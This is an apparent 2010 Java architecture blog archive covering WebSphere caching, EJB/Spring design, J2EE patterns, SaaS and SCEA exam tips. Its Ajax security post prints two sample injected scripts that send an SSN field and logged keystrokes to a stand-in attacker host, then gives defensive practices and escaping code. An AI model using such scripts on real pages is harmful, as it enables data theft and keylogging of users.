Tuesday, December 21, 2010

WebSphere's DynaCache Hibernate Caching Adapter

WebSphere Application Server (from version 6.x onwards) supports JPA (Java Persistence API). Its default ORM provider is OpenJPA, and other ORM tools can be plugged in easily. For distributed caching, WAS (WebSphere Application Server) uses DynaCache, which is very useful in a clustered environment. Because the caching architecture is pluggable, any ORM tool can be plugged in through an ORM caching adapter.

Hibernate is a very popular and stable ORM tool, but it has an issue with WAS: there is no Hibernate caching adapter to plug into IBM's distributed caching framework.

So I decided to make a WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.

Please visit my project at http://code.google.com/p/webspherehibernateadapter/ for more details.

Monday, December 06, 2010

High Scalable and Distributed Architecture

This article describes how to achieve high scalability with Java EE EJB 3.0 and the Spring Framework, and how this hybrid solution can scale in a cloud environment.

In the enterprise world, the Spring Framework combined with a standard ORM tool like Hibernate has gained considerable acceptance as a lightweight architecture for mid-sized applications. The Java EE 5 specification also made major changes to the component architecture, trying to close gaps such as IoC and ORM.

The concept of IoC is still immature in Java EE 5, and the flexibility, AOP support and relative strengths of Spring and an ORM tool like Hibernate further improve the productivity and quality of any web-based application. Since the JPA specification (part of Java EE 5) prescribes a pluggable design, any JPA-compatible ORM tool can be used in any application server: IBM WebSphere, for example, uses Apache OpenJPA as its default provider, but Hibernate can easily be plugged in.

This article demonstrates how to build a highly scalable application with a hybrid of EJB 3.0, Spring 3.0.x and Hibernate. The Spring Framework has its own remoting APIs and options, but EJB is a standard specification and can easily be migrated across application servers.
By designing a flexible component architecture, the application uses the power of EJB 3.0, the IoC and AOP of Spring 3.0.x, and the ORM capability of Hibernate.

For more details, visit my published article on the TheServerSide website.

Sunday, September 05, 2010

Ajax and Web Application Security

Nowadays Ajax, which is meant to increase interactivity, application speed and usability, is growing in popularity because it is built on JavaScript, which has rich user interface capabilities such as dynamic forms and their properties, pop-up controls, control over information display, browser properties and so on.

Ajax uses several web technologies:
  • HTML or XHTML: provides the standards for displaying content
  • Cascading Style Sheets (CSS): provides the standards for presenting content
  • JavaScript: a scripting language used for client-side, browser-based applications
  • Document Object Model (DOM): a standard object model used for displaying dynamic content and handling related interaction
  • XML and XSLT: provide the capability to manipulate, exchange and transfer data between client and server
  • XMLHttpRequest (XHR): this client-side JavaScript API is used to open HTTP connections to the server and exchange information. The information can be plain text, XML or JSON.
  • JavaScript Object Notation (JSON): a lightweight, text-based and language-independent data exchange format between client and server
How It Works
The figure below shows the flow of an AJAX request:


  • The user generates an event, or some asynchronous event fires at the client end, resulting in a JavaScript call
  • An XMLHttpRequest JavaScript object is created and configured with the request parameters, along with the event component identifier and user-defined values (if any)
  • That object makes an asynchronous call to the web / application server. The call may go to a web service, a servlet, a JSF AJAX component etc.
  • Based on the request, the server may fetch the desired data from the data store
  • That data is pushed back to the client browser in the form of plain text, XML or JSON
  • The XMLHttpRequest callback method receives the data, processes it and updates the HTML DOM representing the web page with the new information
AJAX Security and Vulnerabilities
AJAX brings good UI (usability) capabilities, but it also opens security holes that make a web application vulnerable. Vulnerabilities can exist on both the server side and the client side. Information flows between server and client as plain text, XML or JSON, which eventually exposes server-side APIs; insufficient security on the server side then leads to unauthenticated access to the system. Use of AJAX also increases the chance of session management vulnerabilities and the risk of access to the hidden URLs that AJAX requests need in order to be processed.
Another issue with AJAX is visible data. XMLHttpRequest sends plain, visible text to the server and may easily reveal database fields like Product Id or Customer Id, which can easily be manipulated by an attacker.

a. Effects of Attack:
  • Hacking passwords and cookies: an attacker can easily steal sensitive information like passwords and cookies by injecting a script into any part of the DOM tree, for example:

    // Injected script: when the button is clicked, read the SSN field and
    // leak it to the attacker's host by loading an image whose URL carries it.
    function hackdata() {
        var data = document.getElementById("ssn").value;
        // document.images (not document.image) is the collection of <img> elements
        document.images[0].src = "http://hackdata.com/hackdata=" + data;
    }
    document.getElementById("button").onclick = hackdata;

The example above shows how an attacker can steal sensitive information. As soon as the user clicks the submit button, an asynchronous request goes to the attacker's site carrying the sensitive information. With the same approach, the attacker can steal cookie information.
  • Hacking keyboard events: through a key logger or mouse sniffer, sensitive information can be captured, for example:

    // Injected key logger: every key release is leaked to the attacker's host
    // by loading an image whose URL carries the key code.
    function hackdata(e) {
        document.images[0].src = "http://hackdata.com/keydata=" + e.keyCode;
    }
    document.body.addEventListener("keyup", hackdata, false);

In the same way, mouse events can be stolen through a mouse sniffer.

  • Inserting information: an attacker can modify the stylesheet to hide sensitive information, for example by setting the font colour to white.
b. Best Practices:
The following best practices need to be followed in an AJAX-based web application:

  • Data validation: to avoid XSS (Cross-Site Scripting), the web application must validate input data. Validate input and filter out possible active and malicious content from untrusted input sources.
  • Avoid dynamic code generation and execution: avoid dynamic code generation such as use of the eval method.
  • Secure use of JSON: since JSON is a subset of JavaScript it may contain malicious code, and many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that, use the regular expression defined in RFC 4627 to make sure the JSON does not contain malicious code.
  • Use of iframes: load data from a different domain into an iframe, which gets its own JavaScript execution context and DOM tree. This prevents the attacker from reaching the main page.
  • Use security testing tools: always use a vulnerability scanning tool to detect potential vulnerabilities in advance.
The above are a few best practices that should be followed to avoid common AJAX attacks.
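The two client-side practices above (secure use of JSON and output filtering against XSS) in working code, as an added example that is not part of the original post. The RFC 4627 regular expression is the one given in section 6 of that RFC; the function names, the sample responses and the use of JSON.parse in place of eval() are my own choices. The functions are written without any DOM calls so that they run under Node.js.

```javascript
// Added example (not from the original post): two client-side defences
// from the best-practice list above, written as plain functions.

// 1. Secure use of JSON. RFC 4627 section 6 gives a regular expression
//    that checks a JSON text contains nothing but JSON tokens before it is
//    handed to eval(). The check first blanks out every string literal,
//    then rejects the text if any character outside the JSON token
//    alphabet survives.
function isRfc4627SafeJson(text) {
  const withoutStrings = text.replace(/"(\\.|[^"\\])*"/g, '');
  return !/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(withoutStrings);
}

// Parse an untrusted response: run the RFC 4627 check, then use JSON.parse
// rather than eval(). JSON.parse never executes code, so the regex is belt
// and braces; the point is that eval() is never reached at all.
function parseUntrustedJson(text) {
  if (!isRfc4627SafeJson(text)) {
    throw new Error('rejected: response contains non-JSON characters');
  }
  return JSON.parse(text);
}

// 2. Data validation / output encoding against XSS. Before untrusted text
//    is placed into the page (e.g. via innerHTML), escape the characters
//    HTML treats as markup so that an injected <script> or event handler
//    renders as literal text instead of executing.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Constructed sample responses, as a server might return them to an
// XMLHttpRequest callback. The second one shows what a hostile response
// aimed at an eval()-based parser could look like: valid JavaScript, not JSON.
const benignResponse = '{"productId": 42, "name": "Widget <b>Pro</b>"}';
const hostileResponse = '{"productId": (function(){ return "x"; })()}';

// Run both responses through the defences and report what happened.
function demo() {
  const product = parseUntrustedJson(benignResponse);
  let hostileRejected = false;
  try {
    parseUntrustedJson(hostileResponse);
  } catch (e) {
    hostileRejected = true;
  }
  return {
    productId: product.productId,
    safeName: escapeHtml(product.name),
    hostileRejected: hostileRejected,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

In a real page the value returned by escapeHtml is what goes into innerHTML (or, better, the text is assigned through textContent, which needs no escaping at all); the RFC 4627 check only matters for code paths that still feed responses to eval().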

Wednesday, September 01, 2010

Messaging and Cloud Computing

In today's world, maintaining the critical parameters of an application, such as high performance, availability and scalability, is a big challenge. This article explains how to achieve high performance, availability and scalability with messaging technologies, WebSphere Application Server (WAS) and the Service Integration Bus (SIB). It also includes hints and best practices and shows how to configure for high availability. A cloud-enabling architecture can be achieved with WAS and SIB.

Sunday, August 29, 2010

Famous J2EE (Java EE) Design Patterns

As most of my friends and juniors occasionally ask me about the frequently used and popular J2EE patterns, I thought of listing the patterns which every Java developer or designer should know. I'm dividing the patterns into the presentation, business and integration tiers.

List of popular patterns and their usage in the Presentation Tier:
1. Intercepting Filter:
  • Used when there is a requirement for centralized and common processing across requests
  • When pre- and post-processing is required across all or selected requests
2. Front Controller (& Application Controller):
  • When common logic must be applied to multiple requests
  • When processing logic must be separated from the presentation view
  • When centralized, controlled access points are required
3. View Helper:
  • When template-based views are required, like JSP, Apache Velocity etc.
  • When programming logic must be separated from the view
4. Service To Worker:
  • Service To Worker = Front Controller + Application Controller + View Helper
  • Used by any presentation framework like Apache Struts

List of popular patterns and their usage in the Business Tier:
1. Business Delegate:
  • When the business tier is accessed from the presentation tier
  • Hides service creation and invocation
2. Service Locator:
  • Used when looking up any enterprise resource, like JNDI lookups, JMS, web services etc.
  • When centralized and reusable lookups (caching or re-establishing connections) are required
3. Session Facade:
  • When direct client access to the application's business tier must be avoided
  • When complex integration of business components must be hidden
4. Transfer Object:
  • When components of different tiers must be accessed to retrieve and update data
  • When remote requests across tiers and the network must be reduced (better network performance)
5. Value List Handler:
  • When the overhead of EJB "finder" methods must be avoided
  • When an efficient search, and iteration over the results, is required
  • Caches search results on the server side

List of popular patterns and their usage in the Integration Tier:
1. Data Access Object:
  • When uniform data access APIs are required
  • When persistent storage must be decoupled from the other tiers
2. Service Activator:
  • When business services or EJBs must be called asynchronously
  • When topic and point-to-point messaging must be plugged in to enable asynchronous processing
3. Web Service Broker:
  • Exposes services to clients, i.e. as web services
The above are the main patterns generally used in J2EE-based applications. Some patterns are used internally by frameworks like Apache Struts and Java EE components like JPA.

Friday, August 27, 2010

SaaS & Cloud Computing - Design Considerations

Designing a SaaS application is a big challenge. There are many dimensions to look at while designing the application, such as maturity level, business goals, business and architecture principles, operational model etc.

According to Microsoft, a SaaS application has four maturity levels:
1. Ad Hoc/Custom: each client or tenant has its own server instance, and the application code is modified to meet their requirements.

2. Configurable: at this level each tenant or client hosts a separate instance of the application, but the code base remains the same for each client, i.e. the application is configurable enough to support each customer.

3. Configurable, Multi-Tenant-Efficient: every client or tenant runs on a single instance that serves all customers, with configurable metadata providing a unique user experience and feature set for each one. The only restriction of this level is that it cannot scale across servers, so performance and availability are issues at this level.

4. Scalable, Configurable, Multi-Tenant-Efficient: at this level multiple clients or tenants are supported by a load-balanced farm of identical instances, with each tenant's data kept separate, and with configurable metadata providing a unique user experience and feature set for each tenant/client.

As far as design and flexibility are concerned, a SaaS application should be designed for level 4.

The following are the design considerations for a SaaS application:
1. Multi-Tenancy: the application should be designed to handle multi-tenancy, i.e. data, UI, business rules etc. should be separated per customer.

2. Security: the application design should ensure that customer data is secure and that there is complete separation of data between customers/tenants. Authentication should also be "pluggable" into the customer's enterprise identity management.

3. Availability: the application should be easily scalable and clusterable so that it is available at any time.

4. Scalability: the application design should be highly scalable and should easily cope with large organizations and user bases.

5. Data Model Extensibility: the database should be easily tailored to fulfil the needs of each vendor without affecting the others.

6. Flexible Presentation: the UI should be highly configurable and flexible so that it can easily be customized for each vendor without affecting the others.

7. Performance: the application should have low response times (for complex pages too) and low transaction processing times.

8. Configurable Business Rules/Processes: the application should be designed to support the addition and customization of each tenant's or company's business rules and processes. The application should also integrate seamlessly with the tenant's enterprise business processes.

9. Multi-language Support: the application should be internationalized so that different tenants can use it across the Internet and around the world.

10. Separation of Concerns: the application should be designed on the concepts of SOA and Separation of Concerns so that it can easily be deployed in the cloud and a cloud bus can be plugged in to communicate with other clouds and on-premises systems. Business agility, or time-to-market, is another advantage of this design.


So, if an application follows the above design considerations, it can easily gain the advantages of maturity "Level 4" and be ported to a cloud environment.

Friday, August 13, 2010

SaaS and Cloud Computing - An Overview

To understand SaaS in a simple way, just think of the e-mail offering from Google (Gmail), where multiple clients, i.e. e-mail id owners, can send and receive mail and use the other features provided by Google.

Google's mail servers are in the cloud, which can easily scale. So this is a perfect example of SaaS and cloud computing.

The figure below helps you visualize SaaS and the cloud space.

So SaaS can be offered as a paid service, like a subscription service. These services can take the form of domain-specific applications such as CRM, SCM etc. For more details, visit www.salesforce.com: the salesforce application is a complete CRM solution deployed in its cloud environment. Generally the vendor or site user is charged on a usage basis, and each SaaS provider has metering capability.

Other kinds of services are free or partially free, such as web mail services (i.e. Gmail), job sites, etc.

The following are the main advantages of adopting the SaaS option:
1. Faster time-to-market
2. Cost-effective option (in most cases)
3. Lower license cost
4. Nearly zero maintenance and software upgrade cost
5. Good option for start-up companies
6. Pay on a usage basis

Apart from these advantages, there are some issues and limitations of SaaS applications:
1. Non-scalable design: generally a SaaS application is expected to handle a large customer base and scale seamlessly in the cloud, but a non-scalable SaaS application design leads to deterioration in performance
2. Hidden costs of the SaaS provider
3. Data security, as multiple users/customers use the same database
4. Availability of the SaaS application

Top SaaS Providers:

There are lots of SaaS providers in all domain areas, including CRM, SCM, health care, retail etc. The following are the market leaders in SaaS:

1. salesforce: provides CRM software on demand. It has various pricing models, starting with a free subscription and a pay-as-you-go model. Currently they offer two SaaS services:
  • Sales Cloud: accounts, contacts, leads, quotes, etc.
  • Service Cloud: customer portal, knowledge base, analytics, etc.

2. Google: has a range of applications as well as web-based offerings, like an e-mail service, calendar, document editor, spreadsheet and others.

3. Zoho: also has a web-based e-mail service, document editor, presentation tool, invoicing, reporting, applicant tracking and many more.

The next topic I'm going to cover is SaaS & Cloud Computing - Application Design Considerations.

Thursday, August 12, 2010

Crack Sun Certified Enterprise Architect (SCEA) Exam

Most aspiring architects frequently ask me "how do I clear the SCEA (OCMJEA) exam?", so I thought I would write down some basic points and an approach to cracking this exam.

This certification is very easy to pass if you understand design patterns. Understanding does not mean that you know the definitions of the patterns; it means that you have designed Java EE-based applications in the past and applied various patterns. This will help you answer the pattern-related questions as well as the architecture-related questions.

So if you have the above experience, half of your battle is won. If you haven't, it's better to hold your horses and wait for some time: design some applications and apply patterns. "Practical experience is a must."

Other things you need to study are application security parameters, design considerations for thick clients, EJB 3.0 usage, presentation frameworks and application integration techniques.

A few good study materials are:

1. The Java EE 5 Tutorial, Third Edition (http://java.sun.com/javaee/5/docs/tutorial/doc/JavaEETutorial.pdf)

2. Core J2EE Patterns: Best Practices and Design Strategies, Second Edition

3. Java Design: Objects, UML, and Process

4. Designing Enterprise Applications with the J2EE Platform

5. Enterprise Integration Patterns

6. The Java EE 5 Tutorial - For Sun Java System Application Server 9.1

7. Sun Certified Enterprise Architect for J2EE Study Guide

8. Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management



For SCEA Part 2 & 3, refer to my next article.